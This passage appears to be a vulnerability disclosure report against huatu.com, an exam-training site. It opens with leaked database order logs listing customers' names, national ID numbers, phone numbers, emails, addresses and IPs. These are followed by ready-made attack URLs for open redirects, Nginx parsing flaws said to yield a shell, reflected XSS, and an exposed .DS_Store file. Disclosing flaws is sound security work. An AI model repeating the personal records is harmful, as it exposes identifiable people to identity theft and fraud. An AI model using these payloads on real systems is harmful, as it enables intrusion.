(`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('399047','S-P1450596642RN548','周锦阳','33078219890517065X','女','18705899883','zjyneil@126.com','','在职','','网络','华图网站','浙江省义乌市国际商贸城3区5楼1街29348');date:20151220153423INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450596370RN751','2317159','1','2080.00','0','118.81.119.174','1450596863','1','2','0','2080','bm5.huatu.com','15934140183');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643409','S-P1450596370RN751','2317159','2015年太原尖草坪招教笔试','2080.00','1','TBTYJS01516','山西分校','太原总部','54','','400','','',2)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2317159','S-P1450596370RN751','王晓丽','140181198706283067','女','15934140183','280329259@qq.com','','在职','','网络','博客','');date:20151220154152INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450597072RN489','2317171','1','10000.00','0','113.105.134.210','1450597312','1','2','0','10000','bm5.huatu.com','13662786043');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643931','S-P1450597072RN489','2317171','2016年东莞市教师招聘面试导师过关协议班TMSZJS11626','10000.00','1','TMSZJS11626','深圳分校','深圳总部','60','','2000','','',2)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2317171','S-P1450597072RN489','钟雯','44142419920705226X','女','13662786043','2456143800@qq.com','','在职','','网络','华图网站','');date:20151220154435INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450596571RN591','2317163','1','29.00','0','218.76.140.198','1450597475','1','2','0','29','bm5.huatu.com','18627380022');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('630537','S-P1450596571RN591','2317163','2016年湖南省公务员考试笔试娄底七点半课堂GSYSK51606A','29.00','1','GSYSK51606A','邵阳分校','娄底市分部','90','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2317163','S-P1450596571RN591','刘旋','430681199405189318','男','18627380022','274895957@qq.com','','应届','','网络','华图网站','湖南人文科技学院');date:20151220154622INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450597413RN771','2317183','1','3680.00','0','61.164.149.46','1450597582','1','2','0','3680','bm5.huatu.com','15606970884');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('623870','S-P1450597413RN771','2317183','2016年福建省公务员笔试辅导课程','3680.00','1','GFZSK11602','福州分校','莆田分部','120','','1300','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2317183','S-P1450597413RN771','徐芳菲','35030219940102002X','女','15606970884','c061331@163.com','','应届','','其它','朋友推荐','');date:20151220154625INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450597373RN959','2317184','1','980.00','0','219.147.0.10','1450597585','1','2','0','980','bm5.huatu.com','13954236920');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('644273','S-P1450597373RN959','2317184','2015年青岛市国家海洋局面试辅导课程系统精讲班MQDSY01539','980.00','1','MQDSY01539','青岛分校','青岛总部','20','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2317184','S-P1450597373RN959','张晓语','370785199108011227','女','13954236920','604810647@qq.com','','应届','','','','');date:20151220154840INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450597286RN966','2317181','1','99.00','0','183.234.62.104','1450597720','1','2','0','99','bm5.huatu.com','15019237422');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('637777','S-P1450597286RN966','2317181','2016年广州教师招聘笔试 教综精讲网络直播课程','99.00','1','TBGZJS016070','广州分校','广州总部','24','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2317181','S-P1450597286RN966','杨华','410721198904103065','女','15019237422','1326202732@qq.com','','在职','','','','');date:20151220154905INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450597708RN907','2317163','1','29.00','0','218.76.140.198','1450597745','1','2','0','29','bm5.huatu.com','18627380022');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('630537','S-P1450597708RN907','2317163','2016年湖南省公务员考试笔试娄底七点半课堂GSYSK51606A','29.00','1','GSYSK51606A','邵阳分校','娄底市分部','90','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2317163','S-P1450597708RN907','刘旋','430681199405189318','女','18627380022','274895957@qq.com','','应届','','网络','华图网站','湖南人文科技学院');date:20151220155401INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450597832RN427','2312078','1','99.00','0','101.69.124.204','1450598041','1','2','0','99','bm5.huatu.com','18367811316');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450597832RN427','2312078','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2312078','S-P1450597832RN427','胡潇倩','330724199404281328','女','18367811316','huxq518@163.com','','应届','','网络','QQ','浙江省东阳市歌山镇上宅村诚艺服饰对面');date:20151220155920INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450597727RN904','2316276','1','4280.00','0','120.32.70.202','1450598360','1','2','0','4280','bm5.huatu.com','15880480915');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('632208','S-P1450597727RN904','2316276','2015年福建省事业单位面试辅导课程','4280.00','1','MFZSY01563','福州分校','福州总部','48','','400','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2316276','S-P1450597727RN904','黄群秀','350423199205254520','女','15880480915','1250513033@qq.com','','在职','','网络','华图网站','福州市西洋新村44座308');date:20151220161447INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450599003RN999','2317224','1','12800.00','0','1.81.195.200','1450599287','1','2','0','11800','bm5.huatu.com','17792183179');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('627570','S-P1450599003RN999','2317224','2016年陕西省公务员考试笔试辅导课程','12800.00','1','GXASK01603A','陕西分校','西安总部','288','','2000','','',2)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2317224','S-P1450599003RN999','赵纬君','612329199112300223','女','17792183179','771272787@qq.com','','其它','','','','');
0x02:三处URL跳转:
http://youxue.huatu.com/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3Dhttp://wenku.huatu.com/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3Dhttp://v.huatu.com/htnews/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D
0x03:Nginx解析漏洞可shell:
http://v.huatu.com/robots.txt/a.phphttp://ahwx.huatu.com/robots.txt/a.phphttp://passport.huatu.com/robots.txt/a.phphttp://m.v.huatu.com/public/css/css.css/a.phphttp://cps.huatu.com/static/css/css.css/a.php
0x04:XSS:
http://ask.huatu.com/user/ssologin.html?returnUrl=--%3E%27%22%3E%3CH1%3EXSS%3C%2FH1%3Ehttp://cps.huatu.com/index.php/home/gourl/?url=http%3A%2F%2Fv.huatu.com%2Fanhui%2Fcg%2F&source=--%3E%27%22%3E%3CH1%3EXSS%3C%2FH1%3E&web=web
0x05DS_Store:
http://tiku.huatu.com/.DS_Store
如图:
我是来找礼物的.我是来找礼物的.我是来找礼物的.
危害等级:中
漏洞Rank:5
确认时间:2015-12-22 10:16
感谢 发布
暂无